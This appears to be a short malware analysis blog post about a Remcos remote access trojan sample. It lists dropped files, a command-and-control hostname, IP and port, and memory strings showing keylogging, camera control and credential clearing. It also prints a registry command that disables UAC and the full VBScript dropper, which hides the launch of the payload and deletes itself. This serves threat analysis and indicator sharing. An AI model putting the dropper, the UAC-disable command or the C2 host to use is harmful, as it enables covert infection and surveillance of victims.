found by Keith Smith @SevenLayerJedi #remcos rat https://twitter.com/SevenLayerJedi/status/980809311042629634
https://pastebin.com/raw/x7DJ9Drj
https://www.hybrid-analysis.com/sample/6050fea1bb63a53a31b0e1ed957427a1d916115c83dffaf2b2d5c25bcc51b146/5ac22fed7ca3e10787046705
exe ran and created a new chrome.exe process where it does it's bidding from
--------------
files seen
--------------
C:\Users\xxx\AppData\Roaming\remcos\remcos.exe
C:\Users\xxx\AppData\Local\temp\install.vbs
chrome.exe
--------------
network connections
--------------
georgeoffor.ddns.net 213.183.58.61
0x812cd1 (42): georgeoffor.ddns.net:1990:pass|@@Host@@5@@
--------------
interesting in memory strings
--------------
0x301994 (166): "C:\Windows\System32\WScript.exe" "C:\Users\Win732\AppData\Local\Temp\install.vbs"
0x413658 (11): CloseCamera
0x413664 (10): OpenCamera
0x41385c (23): Uploading file to C&C:
0x413884 (25): Offline Keylogger Started
0x4138b0 (27): { User has been idle for
0x4138cc (12): minutes }
0x4138dc (24): Online Keylogger Started
0x4138f8 (24): Online Keylogger Stopped
0x413914 (25): Offline Keylogger Stopped
0x413c00 (38): [Chrome StoredLogins found, cleared!]
0x413d0c (32): [Firefox StoredLogins cleared!]
0x414210 (24): \install.vbs
0x4142f0 (28): \uninstall.vbs
0x414398 (22): \update.vbs
0x41444c (24): \restart.vbs
0x4146c4 (27): C:\Windows\System32\cmd.exe
0x4146e0 (129): /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
0x4148b4 (17): Connected to C&C!
0x4148c8 (34): Initializing connection to C&C...
0x414d74 (27): * Breaking-Security.Net
0x414d90 (11): * REMCOS v
0x812cd1 (42): georgeoffor.ddns.net:1990:pass|@@Host@@5@@
0x817039 (11): Screenshots
0x817579 (23): Software\Remcos-SCLZ2Y\
0x817aa2 (94): C:\Users\xxx\AppData\Roaming\remcos\logs.dat
--------------
interesting api calls seen
--------------
chrome.exe CreateDirectoryW ( "C:\Users\xxx\AppData\Roaming\remcos", NULL ) FALSE
chrome.exe CreateFileW ( "C:\Users\xxx\AppData\Roaming\remcos\logs.dat", GENERIC_READ, FILE_SHARE_DELETE | FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL )
chrome.exe gethostbyname ( "georgeoffor.ddns.net" ) 0x00386da8 0.0003958
--------------
interesting file found install.vbs
--------------
WScript.Sleep 1000
Set fso = CreateObject("Scripting.FileSystemObject")
fso.DeleteFile "C:\Users\xxx\Desktop\bad.exe"
CreateObject("WScript.Shell").Run "cmd /c ""C:\Users\xxx\AppData\Roaming\remcos\remcos.exe""", 0
fso.DeleteFile(Wscript.ScriptFullName)
--------------
Monday, April 2, 2018
Remcos rat sample
https://pastebin.com/raw/WQ2k21mE
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment